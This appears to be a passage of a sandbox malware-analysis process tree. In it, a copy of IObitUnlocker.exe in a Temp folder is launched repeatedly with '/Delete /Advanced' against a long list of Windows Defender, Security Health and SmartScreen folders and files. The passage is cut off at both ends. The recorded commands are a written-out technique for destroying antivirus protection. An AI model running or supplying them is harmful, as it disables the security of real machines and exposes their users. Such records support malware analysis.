Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 